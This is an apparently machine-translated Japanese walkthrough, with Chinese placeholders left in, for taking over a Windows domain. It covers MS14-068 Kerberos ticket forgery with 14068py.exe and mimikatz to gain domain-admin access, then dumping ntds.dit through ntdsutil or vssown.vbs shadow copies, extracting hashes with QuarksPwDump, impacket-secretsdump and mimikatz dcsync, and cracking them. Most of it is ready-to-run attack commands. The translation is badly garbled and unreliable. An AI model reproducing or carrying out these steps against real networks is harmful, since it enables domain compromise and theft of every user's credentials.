使用プロセス
1.脆弱性迷彩法案を活用します
2.エクスポートドメインのハッシュ値
3.ハッシュ値は、使用をクラック
まず、迷彩法案を活用
条件
ドメイン名、SIDの名前を知っている、と一般的なドメインのユーザーのアカウントのパスワードを持って、そしてコントロールのドメイン知識
ステップ
1. SIDを取得し、共通のドメインユーザーのマシンを取得します
whoami /all
2.ドメイン名、コントロールを取得したドメイン名
ドメイン取得:
ipconfig /all 
クエリドメインコントローラ:
net time /domain
3.アップロード14068py.exe、コマンドラインコマンド法案迷彩は、TGTは、現在のディレクトリ内のファイルを生成します。
14068py.exe -u 域用户全称 -p "密码" -s sid -d 域控名全称ユーザーフルネーム:ユーザ名@ドメイン
すべてのノートを削除するにはklistをパージを入力します
5.アップロードmimikatz.exe、コマンドを入力します。ちょうど装った法案
mimikatz.exe "kerberos::ptc xxxxx" exitTGTはただのxxxxxで生成されたファイル名を置き換えます
6.成功を置き換える、klistを表示する法案を入力します。
7.ノー・パスワードを記述、ドメインコントローラのCドライブのリストを表示するためのもので、ノートは成功は、ドメイン管の身元を偽装しました
dir \\域控全称\c$
第二に、エクスポートドメインのハッシュ値
・取得し、取得したハッシュのNtds.ditを分析
思考
1.ノートに成功リモート接続した後、迷彩、スケジュールされたタスクを使用して、またはリモートコマンド実行制御DCを実行する(直接の実験は、DCでここに使用スケジュールされたタスクを実施したり、リモートコマンド実行制御を実行DCの使用の詳細にジャンプするには、ここをクリックし)
2。得るためにツールを使用して、ハッシュ値フィールドを取得するために分析します
1.取得のNtds.dit
ntdsutilの(win8の後に来る)輸出のNtds.ditを使用して1.1
1.1.1対話型シェル:
インタラクティブインタフェースにNTDSUTIL入力
入力スナップショット機能
活動の例としては、NTDS設定します
activate instance ntds
入力したスナップショットを作成します
Cドライブをマウントし、スナップショット、今回はそこにスナップショットのように、ディスクCとCディスクコンテンツとなって、そして占有していません
mount 快照名 
指定したパスにスナップショットの下のコピーのNtds.dit、ntdsutilを終了します(オフライン分析は、Windows \ System32に\ CONFIG \ SYSTEM、省略オンライン分析でスナップショットをコピーする必要があります)
copy C:\$SNAP_202003310959_VOLUMEC$\Windows\NTDS\ntds.dit c:\
再びntdsutilのスナップショット機能を入力し、削除スナップショット
ntdsutil
snapshot
unmount 快照名
1.1.2非対話型シェル:
一度にスナップショットを作成するには、次のコマンドを入力して終了
ntdsutil snapshot "activate instance ntds" create quit quit
ちょうど生成されたスナップショットをマウントするには、次のコマンドを入力します。
ntdsutil snapshot "mount 快照名" quit quit
指定したパスにスナップショットの下のコピーのNtds.dit(オフライン分析は、Windows \ System32に\ CONFIG \ SYSTEM、省略オンライン分析でスナップショットをコピーする必要があります)
copy C:\$SNAP_202003311014_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds1.dit
スナップショットを削除します
ntdsutil snapshot "unmount 快照名" quit quit
1.2 vssown.vbsエキスのNtds.dit
アップロードスクリプトと実行中のスクリプト
cscript vssown.vbs /start
実行中のステータスを表示
cscript vssown.vbs /status
Cドライブのスナップショットを作成します。
cscript vssown.vbs /create C情報のスナップショットを見ます
cscript vssown.vbs /list\\?\ GLOBALROOT \デバイス\ HarddiskVolumeShadowCopy1が道路cのディスクスナップショットのルートディレクトリです
コピーはのNtds.ditにカレントディレクトリにスナップショット
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit ntds.dit
SYSTEMディレクトリ内の現在のスナップショットをコピーします(オフライン分析のニーズ、オンライン分析省略)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM SYSTEM
作成したスナップショットの削除
cscript vssown.vbs /delete *
停止スクリプト
cscript vssown.vbs /stop
2.分析のNtds.dit
2.1 QuarkPwDumpは、オンライン分析を使用
QuarkPwDump.exeは、ターゲットマシンのCにアップロード:/
ドメインユーザーパスワードでコマンドGETのNtds.ditを入力します。
QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit路径
impacket-secretsdumpのオフライン分析で2.2カーリー使用
カーリーに生成されたNtds.ditおよびSYSTEMをコピーします
ターミナルは、クラックのNtds.ditにコマンドを入力します。
impacket-secretsdump -ntds ntds.dit -system SYSTEM local
・Mimikatzエキスハッシュ
条件
これは、シェル通常のドメインメンバーのマシンを得ることができます
ステップ
迷彩14068で上記の直流リモート接続の注意事項に基づいて、
ソフトウェアにMimikatz.exe入力
ユーザーが指定したドメインのハッシュ値を抽出します
lsadump::dcsync /domain:域名 /user:用户名 /csv
第三に、コードをクラックします
、クラッキングツール、CMD5亀裂を使用してハッシュに失敗した試行をクラック注入することができます
具体的な使用のハッシュ注入を見るにはここをクリックしてください
